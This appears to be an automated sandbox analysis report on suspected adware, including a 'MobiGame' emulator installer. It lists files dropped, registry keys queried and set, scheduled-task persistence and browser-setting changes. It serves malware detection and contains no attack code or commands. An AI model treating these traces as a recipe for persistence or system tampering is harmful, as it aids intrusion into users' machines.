File created C:\Program Files\MobiGame\playstore\api-ms-win-core-debug-l1-1-0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\MobiGame\playstore\System.IO.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\MobiGame\playstore\System.Net.Http.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\MobiGame\playstore\System.Reflection.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\MobiGame\playstore\System.Xml.XmlSerializer.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\MobiGame\playstore\locales\id.pak C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\MobiGame\playstore\System.ComponentModel.DataAnnotations.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\MobiGame\playstore\System.ComponentModel.TypeConverter.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\MobiGame\playstore\api-ms-win-core-namedpipe-l1-1-0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\MobiGame\player\swiftshader\libGLESv2.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\MobiGame\playstore\Microsoft.Win32.SystemEvents.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\MobiGame\playstore\System.Security.Cryptography.Primitives.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\MobiGame\player\VBoxDDU.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\MobiGame\player\VBoxNetAdp6.inf C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\MobiGame\ian2qazz.newcfg C:\Windows\System32\svchost.exe N/A
File created C:\Program Files\MobiGame\playstore\Chromely.Core.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\MobiGame\playstore\dist\static\media\fa-regular-400.a3f7358b4bd2b708c04d.woff2 C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\MobiGame\haxm\haxm_check.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\MobiGame\playstore\Microsoft.Extensions.DependencyInjection.Abstractions.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\MobiGame\playstore\locales\tr.pak C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\MobiGame\playstore\api-ms-win-core-libraryloader-l1-1-0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\MobiGame\playstore\api-ms-win-crt-conio-l1-1-0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\MobiGame\playstore\Playstore.runtimeconfig.json C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\MobiGame\playstore\System.Transactions.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\MobiGame\gsz4gri4.tmp C:\Windows\system32\rundll32.exe N/A
File created C:\Program Files\MobiGame\player\api-ms-win-core-profile-l1-1-0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\MobiGame\ServiceStack.Common.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\MobiGame\playstore\System.IO.Pipes.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\MobiGame\player\VBoxUSBMon.cat C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\MobiGame\playstore\api-ms-win-crt-convert-l1-1-0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\MobiGame\player\MobiVMMRC.rc C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\MobiGame\playstore\System.IO.FileSystem.DriveInfo.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\MobiGame\playstore\System.Security.Cryptography.Csp.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\MobiGame\player\VBoxNetFlt.cat C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\MobiGame\playstore\api-ms-win-core-errorhandling-l1-1-0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\MobiGame\playstore\System.Globalization.Calendars.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\MobiGame\playstore\System.Runtime.Handles.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\MobiGame\playstore\System.Security.AccessControl.dll C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Program Files\MobiGame\MobiGameUpdater.InstallLog C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Installer\MSIF129.tmp-\WixSharp.UI.dll C:\Windows\system32\rundll32.exe N/A
File created C:\Windows\Installer\SourceHash{9658D5F3-6237-40F7-B727-C7F8CC997DDD} C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIE26A.tmp-\WixSharp.UI.dll C:\Windows\system32\rundll32.exe N/A
File opened for modification C:\Windows\Installer\MSI6E40.tmp-\WixSharp.dll C:\Windows\system32\rundll32.exe N/A
File opened for modification C:\Windows\Installer\MSIF08C.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIF129.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIF129.tmp-\Microsoft.Deployment.WindowsInstaller.dll C:\Windows\system32\rundll32.exe N/A
File opened for modification C:\Windows\Installer\MSI76CE.tmp-\VirtualBoxSetup.exe C:\Windows\system32\rundll32.exe N/A
File opened for modification C:\Windows\Installer\MSI849C.tmp-\InstallUtil.InstallLog C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe N/A
File opened for modification C:\Windows\Installer\MSIAE7F.tmp-\VirtualBoxSetup.exe C:\Windows\system32\rundll32.exe N/A
File opened for modification C:\Windows\Installer\MSIA68D.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIBD17.tmp-\WixSharp.dll C:\Windows\system32\rundll32.exe N/A
File opened for modification C:\Windows\Installer\MSIBEB7.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI703.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI849C.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI7E19.tmp-\WixSharp.UI.dll C:\Windows\system32\rundll32.exe N/A
File opened for modification C:\Windows\Installer\MSI80CA.tmp-\VirtualBoxSetup.exe C:\Windows\system32\rundll32.exe N/A
File opened for modification C:\Windows\Installer\MSI79EC.tmp-\VirtualBoxSetup.exe C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\Installer\MSI7E71.tmp-\VirtualBoxSetup.pdb C:\Windows\system32\rundll32.exe N/A
File created C:\Windows\Installer\e58bd41.msi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\inprogressinstallinfo.ipi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\e58bd3a.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI732C.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI849C.tmp-\CustomAction.config C:\Windows\system32\rundll32.exe N/A
File opened for modification C:\Windows\Installer\MSI849C.tmp-\WixSharp.dll C:\Windows\system32\rundll32.exe N/A
File opened for modification C:\Windows\Installer\MSIAE7F.tmp-\VirtualBoxSetup.pdb C:\Windows\system32\rundll32.exe N/A
File opened for modification C:\Windows\Installer\MSIF129.tmp-\VirtualBoxSetup.exe C:\Windows\system32\rundll32.exe N/A
File opened for modification C:\Windows\Installer\MSI792.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSID1AF.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI76CE.tmp-\CustomAction.config C:\Windows\system32\rundll32.exe N/A
File opened for modification C:\Windows\Installer\MSIA68D.tmp-\WixSharp.dll C:\Windows\system32\net.exe N/A
File opened for modification C:\Windows\Installer\MSIBD17.tmp-\Microsoft.Deployment.WindowsInstaller.dll C:\Windows\system32\rundll32.exe N/A
File created C:\Windows\Installer\e58bd3b.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI86F5.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIDF7B.tmp-\WixSharp.dll C:\Windows\System32\Conhost.exe N/A
File opened for modification C:\Windows\Installer\MSIE26A.tmp-\VirtualBoxSetup.pdb C:\Windows\system32\rundll32.exe N/A
File opened for modification C:\Windows\Installer\MSI79EC.tmp-\VirtualBoxSetup.pdb C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\Installer\MSI7E71.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI849C.tmp-\VirtualBoxSetup.exe C:\Windows\system32\rundll32.exe N/A
File opened for modification C:\Windows\Installer\MSIBD17.tmp-\CustomAction.config C:\Windows\system32\rundll32.exe N/A
File opened for modification C:\Windows\Installer\MSI483E.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI49A6.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI6937.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI7E71.tmp-\VirtualBoxSetup.exe C:\Windows\system32\rundll32.exe N/A
File opened for modification C:\Windows\Installer\MSI3A6E.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIB6D1.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI744C.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIA68D.tmp-\VirtualBoxSetup.pdb C:\Windows\system32\net.exe N/A
File opened for modification C:\Windows\Installer\MSIBD17.tmp-\WixSharp.UI.dll C:\Windows\system32\rundll32.exe N/A
File opened for modification C:\Windows\Installer\MSI7E19.tmp-\VirtualBoxSetup.exe C:\Windows\system32\rundll32.exe N/A
File opened for modification C:\Windows\Installer\MSI86F5.tmp-\WixSharp.dll C:\Windows\system32\rundll32.exe N/A
File opened for modification C:\Windows\Installer\MSIDF7B.tmp-\WixSharp.UI.dll C:\Windows\System32\Conhost.exe N/A
File opened for modification C:\Windows\Installer\MSI76CE.tmp-\Microsoft.Deployment.WindowsInstaller.dll C:\Windows\system32\rundll32.exe N/A
File opened for modification C:\Windows\Installer\MSI7E71.tmp-\WixSharp.dll C:\Windows\system32\rundll32.exe N/A
File created C:\Windows\Installer\e58bd36.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\e58bd3b.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI1948.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI9844.tmp-\Microsoft.Deployment.WindowsInstaller.dll C:\Windows\system32\rundll32.exe N/A
File opened for modification C:\Windows\Installer\MSIA68D.tmp-\WixSharp.UI.dll C:\Windows\system32\net.exe N/A
File opened for modification C:\Windows\Installer\MSI744C.tmp-\CustomAction.config C:\Windows\system32\rundll32.exe N/A
File opened for modification C:\Windows\Installer\MSI849C.tmp-\WixSharp.UI.dll C:\Windows\system32\rundll32.exe N/A
File opened for modification C:\Windows\Installer\MSIA96D.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\{0CD5AE2D-BB58-4E35-8B5C-AFE9A9189E1A}\app_icon.ico C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log C:\Windows\system32\msiexec.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 0000000004000000e177523499fd9a390000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff000000002701010000080000e17752340000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff000000000700010000680900e1775234000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1de1775234000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff000000000000000000000000e177523400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\system32\vssvc.exe N/A
Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\system32\vssvc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 C:\Windows\system32\taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters C:\Windows\system32\vssvc.exe N/A
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr C:\Windows\system32\vssvc.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName C:\Windows\system32\taskmgr.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters C:\Windows\system32\vssvc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\system32\taskmgr.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName C:\Windows\system32\taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 C:\Windows\system32\taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\system32\taskmgr.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\pcgame_8B68C5CF\setup_com.kiloo.subwaysurf_flow6mkt_0.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Users\Admin\AppData\Local\Temp\pcgame_8B68C5CF\setup_com.kiloo.subwaysurf_flow6mkt_0.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\taskmgr.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\system32\taskmgr.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\Downloads\2023-11-23-05\e9f765ba3c25951e6d6ad8d13133c569862ae77ccaf65de7683c3d40c903cf90.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\Downloads\2023-11-23-05\e9f765ba3c25951e6d6ad8d13133c569862ae77ccaf65de7683c3d40c903cf90.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Capabilities\Hidden = "0" C:\Windows\system32\ie4uinit.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\SOFTWARE\Microsoft\Internet Explorer\BrowserEmulation\CVListTTL = "0" C:\Windows\system32\ie4uinit.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\SOFTWARE\Microsoft\Internet Explorer\BrowserEmulation\CVListTTL = "0" C:\Windows\servicing\TrustedInstaller.exe N/A
Key created \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\servicing\TrustedInstaller.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\SOFTWARE\Microsoft\Internet Explorer\Main\OperationalData = "12" C:\Windows\servicing\TrustedInstaller.exe N/A
Key created \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\Capabilities C:\Windows\system32\ie4uinit.exe N/A
Key created \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Software\Microsoft\Internet Explorer\BrowserEmulation C:\Windows\system32\ie4uinit.exe N/A
Key created \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\Capabilities C:\Windows\servicing\TrustedInstaller.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Capabilities\Hidden = "0" C:\Windows\servicing\TrustedInstaller.exe N/A
Key created \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Software\Microsoft\Internet Explorer\BrowserEmulation C:\Windows\servicing\TrustedInstaller.exe N/A
Key created \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\system32\ie4uinit.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{9E04CAB2-CC14-11DF-BB8C-A2F1DED72085} C:\Windows\system32\OpenWith.exe N/A
Key created \REGISTRY\USER\.DEFAULT C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\system32\OpenWith.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\ZFRqtr = 00000000010000000000000000000000000080bf000080bf000080bf000080bf000080bf000080bf000080bf000080bf000080bf000080bfffffffffe0eb841ed81dda0100000000 C:\Windows\system32\OpenWith.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\ApplicationAssociationToasts\MSEdgeHTM_.mhtml = "0" C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix C:\Windows\system32\OpenWith.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{FA99DFC7-6AC2-453A-A5E2-5E2AFF4507BD}\Count C:\Windows\system32\OpenWith.exe N/A
Key created \REGISTRY\USER\.DEFAULT C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pdf\OpenWithList C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\.DEFAULT C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.xhtml C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe N/A
Key created \REGISTRY\USER\.DEFAULT C:\Windows\system32\sc.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.svg C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mht\OpenWithProgids\mhtmlfile = "0" C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice\ProgId = "MSEdgeHTM" C:\Windows\system32\OpenWith.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mhtml\UserChoice C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CAA59E3C-4792-41A5-9909-6A6A8D32490E}\Version = "5" C:\Windows\system32\OpenWith.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Feeds\MUID\ C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{2B379600-B42B-4FE9-A59C-A312FB934935}\DeviceId = "0018400C2942BED0" C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Edge\PreferenceMACs\Default\extensions.settings\ampmimodbocknpfehkbdjolnnbongejb = "725D2CE80FABFB10DAB32456304109061A3CEEFDF4F0C995FB5C42E568475573" C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.shtml C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Edge C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\ApplicationAssociationToasts\AppXdn5b0j699ka5fqvrr3pgjad0evqarm6d_ms-xbl-3d8b930f = "0" C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Ammyy\Admin C:\Users\Admin\Desktop\adwares\4731517b198414342891553881913565819509086b8154214462788c740b34c9.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mht\OpenWithProgids C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-18_Classes\Local Settings C:\Users\Admin\Desktop\adwares\4731517b198414342891553881913565819509086b8154214462788c740b34c9.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{9E04CAB2-CC14-11DF-BB8C-A2F1DED72085}\Count C:\Windows\system32\OpenWith.exe N/A
Key created \REGISTRY\USER\.DEFAULT C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\.DEFAULT C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft C:\Windows\system32\OpenWith.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Edge\PreferenceMACs\Default\extensions.settings\jdiccldimpdaibmpdkjnbmckianbfold = "8211D605C42C0E7CA62BE1DD0216CE80B7AD80AB6607B64AA14FD1F99F2505FA" C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\.DEFAULT C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Version = "5" C:\Windows\system32\OpenWith.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
